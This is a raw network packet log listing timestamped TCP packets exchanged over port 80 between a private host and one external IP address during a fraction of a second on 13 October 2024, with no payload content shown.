Oct 13, 2024 07:28:59.378382921 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.378403902 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.378591061 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.378591061 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.379410982 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.379431009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.379476070 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.379476070 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.380367994 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.380389929 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.380428076 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.380428076 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.381414890 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.381437063 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.381477118 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.381477118 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.382394075 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.382414103 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.382441044 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.382448912 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.382477045 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.382477045 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.383408070 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.383450985 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.383491993 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.383491993 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.384454012 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.384474993 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.384517908 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.384700060 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.385409117 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.385427952 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.385466099 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.385467052 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.386400938 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.386423111 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.386446953 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.386461020 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.386461020 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.386493921 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.446639061 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.446753979 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.446775913 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.446959019 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.447323084 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.447638035 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.447668076 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.447937965 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.448493958 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.448513985 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.448555946 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.448740005 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.449507952 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.449527025 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.449563980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.449618101 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.450510979 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.450531006 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.450552940 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.450653076 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.450685978 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.451545954 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.451565981 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.451612949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.451613903 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.452554941 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.452574015 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.452755928 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.453461885 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.453586102 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.453613997 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.453639984 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.453649044 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.453649044 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.453686953 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.454575062 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.454596043 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.454634905 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.454634905 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.455595970 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.455615997 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.455656052 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.455656052 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.456614971 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.456638098 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.456672907 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.456672907 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.457642078 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.457663059 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.457684994 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.457695961 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.457730055 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.457730055 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.458645105 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.458668947 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.458707094 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.458707094 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.459465981 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.459481001 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.459530115 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.459530115 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.460263968 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.460285902 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.460330963 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.460330963 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.461062908 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.461082935 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.461118937 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.461303949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.461872101 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.461891890 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.461914062 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.461924076 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.461956978 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.461956978 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.462663889 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.462683916 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.462718964 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.462718964 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.463500023 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.463520050 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.463557959 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.463557959 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.464267969 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.464289904 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.464325905 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.464325905 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.465066910 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.465090036 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.465109110 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.465125084 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.465125084 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.465157032 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.465847015 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.465869904 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.465908051 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.465909004 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.466651917 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.466674089 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.466707945 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.466707945 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.467421055 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.467441082 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.467478037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.467478037 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.468169928 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.468192101 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.468226910 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.468398094 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.468902111 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.468923092 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.468945026 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.468955994 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.468955994 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.468991995 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.469602108 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.469621897 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.469659090 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.469659090 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.470335007 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.470355034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.470392942 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.470392942 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.471014977 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.471038103 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.471071959 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.471240044 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.471700907 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.471720934 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.471743107 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.471757889 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.471757889 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.471765995 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.471780062 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.471800089 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.472723961 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.472745895 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.472764015 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.472788095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.472788095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.472820997 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.473681927 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.473704100 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.473722935 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.473737955 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.473737955 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.473771095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.474652052 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.474673986 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.474692106 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.474709988 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.474709988 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.474713087 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.474736929 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.474736929 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.475598097 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.475619078 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.475640059 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.475652933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.475687027 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.475687027 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.499512911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.499536037 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.499545097 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.499912024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.536998987 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.537189960 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.537193060 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.537214994 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.537348986 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.537384033 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.537415028 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.537530899 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.537530899 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.537530899 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.537530899 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.538288116 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.538306952 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.538330078 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.538492918 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.538492918 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.538492918 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.539288044 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.539308071 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.539329052 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.539356947 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.539356947 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.539392948 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.540316105 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.540342093 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.540364027 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.540378094 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.540383101 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.540400982 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.540400982 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.540427923 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.541307926 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.541330099 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.541349888 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.541368008 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.541368961 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.541403055 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.542287111 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.542306900 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.542329073 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.542346001 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.542346001 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.542378902 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.543298960 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.543320894 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.543344021 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.543359041 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.543359995 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.543365002 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.543381929 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.543412924 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.544318914 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.544338942 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.544362068 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.544373035 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.544373035 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.544411898 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.545089006 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.545111895 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.545131922 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.545150042 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.545150042 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.545183897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.545907974 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.545928955 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.545950890 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.545963049 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.545970917 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.545985937 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.545985937 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.546011925 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.546681881 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.546703100 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.546725035 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.546736956 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.546763897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.546763897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.547477007 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.547497034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.547519922 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.547534943 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.547534943 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.547568083 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.548264027 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.548288107 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.548306942 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.548321009 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.548321009 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.548327923 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.548346996 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.548363924 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.549067020 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.549088955 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.549108028 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.549124002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.549124002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.549163103 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.549822092 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.549871922 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.549874067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.549899101 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.549912930 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.549954891 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.550684929 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.550705910 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.550728083 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.550746918 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.550792933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.550792933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.550832033 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.550832033 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.551476002 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.551495075 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.551517963 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.551533937 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.551568985 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.551568985 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.552239895 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.552261114 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.552284002 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.552295923 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.552295923 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.552333117 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.552998066 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.553019047 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.553041935 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.553055048 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.553061008 CEST	80	49161	104.168.7.25	192.168.2.22
